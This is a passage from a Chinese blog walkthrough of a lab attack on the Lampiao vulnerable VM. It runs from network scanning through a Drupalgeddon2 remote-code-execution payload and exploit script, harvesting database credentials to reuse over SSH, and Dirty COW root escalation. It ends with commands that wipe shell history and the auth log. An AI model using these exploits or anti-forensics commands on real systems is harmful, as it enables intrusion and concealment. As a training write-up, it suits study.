当前位置：首页 > article >正文

从信息收集到Root权限：一次完整的Lampiao靶机渗透实战解析

article 2026/4/14 14:56:40

1. 环境准备与信息收集第一次接触Lampiao靶机时我习惯性地先搭建了一个隔离的测试环境。建议使用VirtualBox或VMware创建一个独立的NAT网络把Kali攻击机和Lampiao靶机放在同一个网段。这里有个小技巧在VirtualBox的全局设置里创建专用NAT网络能避免干扰真实网络环境。用ifconfig确认Kali的IP后开始扫描同网段存活主机。很多人喜欢直接用nmap -sP但我更推荐这个组合命令arp-scan -l --interfaceeth0 | grep -v DUP它能快速列出活跃IP且避免重复结果。最近一次测试中我发现靶机IP是192.168.56.103这个结果比传统Ping扫描更可靠特别是在某些禁Ping的环境。接下来用半开放扫描探测开放端口nmap -sS -T4 --min-rate 1000 -p- 192.168.56.103参数解释-T4加速扫描我的老笔记本扛不住T5--min-rate 1000每秒至少发1000个包-p-全端口扫描扫描结果显示80和1898端口的HTTP服务最有价值。这里有个细节1898端口的服务头显示是Apache/2.4.18而80端口是Nginx这种混合Web服务器配置往往藏着配置漏洞。2. Web渗透与初始突破访问1898端口发现Drupal 7.54这个版本存在著名的Drupalgeddon2漏洞CVE-2018-7600。我试过三种利用方式手动验证漏洞在用户注册页注入POST /?quser/register HTTP/1.1 ... form_iduser_register_formmail[#post_render][]execmail[#type]markupmail[#markup]id如果返回uid信息说明存在RCE漏洞。MSF自动化利用use exploit/unix/webapp/drupal_drupalgeddon2 set RHOSTS 192.168.56.103 set RPORT 1898 set TARGETURI / exploit实测发现需要调整targeturi参数为/才能成功这是很多教程没提到的坑。手工利用脚本我修改了公开的Python脚本添加了交互式shell维持功能import requests from cmd import Cmd class Terminal(Cmd): prompt Drupal def default(self, args): resp requests.post(target, datapayload.format(args), verifyFalse) print(resp.text.split(!--)[0]) payload {form_id:user_register_form, mail[#type]:markup, mail[#markup]:{}, ...} terminal().cmdloop()3. 横向移动与凭证获取拿到www-data权限后我习惯先做这几件事升级shellpython3 -c import pty;pty.spawn(/bin/bash)检查sudo权限sudo -l查找配置文件find /var/www -name settings.php在/var/www/html/sites/default/settings.php中发现数据库凭证$databases array ( default array ( default array ( database drupal, username drupaluser, password Virgulino, host localhost, port , driver mysql, ), ), );用这个密码成功SSH登录系统用户tiagossh tiago192.168.56.103 # 密码Virgulino4. 内核提权实战查看内核版本uname -r显示3.13.0-32-generic正好在脏牛漏洞影响范围内。我测试了两种提权方法方法一MSF编译上传searchsploit dirty # 找到40847.cpp upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp g -Wall -pedantic -O2 -stdc11 -pthread -o cow /tmp/40847.cpp -lutil ./cow执行后会自动把root密码改为dirtyCowFun实测成功率90%。方法二手动编译遇到g缺失时可以这样解决# 靶机上 nc -lvp 4444 dcow.tar.gz # Kali上 tar czvf dcow.tar.gz 40847.cpp nc 192.168.56.103 4444 dcow.tar.gz # 靶机解压后 make ./dcow这种方法的优势是不依赖g直接用make编译。提权成功后记得清理痕迹history -c rm -rf /tmp/* echo /var/log/auth.log整个渗透过程最耗时的其实是信息收集阶段约占总时间的60%。建议新手重点关注Nmap的高级用法和Web目录爆破技巧比如用gobuster时加上-x php,html,txt扩展名参数能显著提高效率。

从信息收集到Root权限：一次完整的Lampiao靶机渗透实战解析

相关文章：

从信息收集到Root权限：一次完整的Lampiao靶机渗透实战解析

实测飞算JavaAI vs Copilot：效率提升不是一点点，完整项目生成才是关键差距

深度解析MelonLoader：Unity游戏模组加载器的架构设计与系统优化

5分钟极速部署：开源在线PPT编辑器的完整配置指南

原神祈愿记录导出工具：3分钟掌握你的抽卡命运

＜数据集＞yolo 瓶盖识别＜目标检测＞

从‘Hello World’到驱动编译：树莓派4B交叉编译工具链实战应用全解析

告别v8！在IMX6ULL上为LVGL v9配置触摸屏和FrameBuffer的完整流程（韦东山/正点原子板通用）

论文AIGC率太高？降痕技巧+平台避坑指南来了

告别嗡嗡声：用双三相电机+DTC，手把手教你打造静音高效的工业风扇控制系统

电脑禁用U口、禁用USB端口、屏蔽移动存储设备使用的方法

Adobe-GenP 3.0：解锁Adobe创意套件的终极完整指南

Arcgis自定义脚本工具开发：从参数配置到交互优化

网站国产化改造，如何做到软件成本几乎为零？

SARScape实战：高效DEM数据获取与预处理全攻略

不止于下载：Dreem睡眠数据集DOD-O/DOD-H到手后，如何快速验证与使用？

单细胞数据合并后，你的聚类图为啥不好看？可能是批次效应在捣鬼

告别pip install失败：用Conda-forge通道一键安装Pycwr及气象雷达数据处理全家桶

从协同过滤到深度学习：Spark机器学习实战全解析

健康160自动挂号工具终极指南：5分钟掌握全自动抢号技巧

3分钟掌握Windows风扇智能控制：告别噪音烦恼的终极指南

Java2Flowchart：一款把 Java 方法一键转换成 Mermaid 流程图的 IntelliJ 插件

绝地求生压枪难题破解：罗技鼠标宏配置终极指南

OpenClaw 太难装了？试试 LangTARS：一行命令部署 + WebUI 管理面板，还能接入 Dify/Coze/nn??坠

Xv6 Lab3: Optimizing Page Tables for Direct User-Kernel Memory Access

5大特性解析：Fast-GitHub浏览器扩展如何实现GitHub访问速度飞跃

5步终极指南：用ObjToSchematic将任何3D模型变成Minecraft建筑

3步掌握飞书文档转换：Cloud Document Converter零基础上手指南

三步构建你的专属知识星球离线图书馆

iFakeLocation技术深度解析：跨平台iOS虚拟定位实战指南